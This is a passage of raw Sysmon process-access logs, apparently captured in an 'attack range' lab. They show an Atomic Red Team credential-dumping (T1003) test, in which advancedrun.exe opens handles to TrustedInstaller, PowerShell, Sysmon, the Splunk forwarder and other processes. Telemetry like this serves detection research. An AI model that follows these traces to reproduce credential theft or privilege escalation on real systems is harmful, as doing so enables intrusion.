17:28:39.339{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+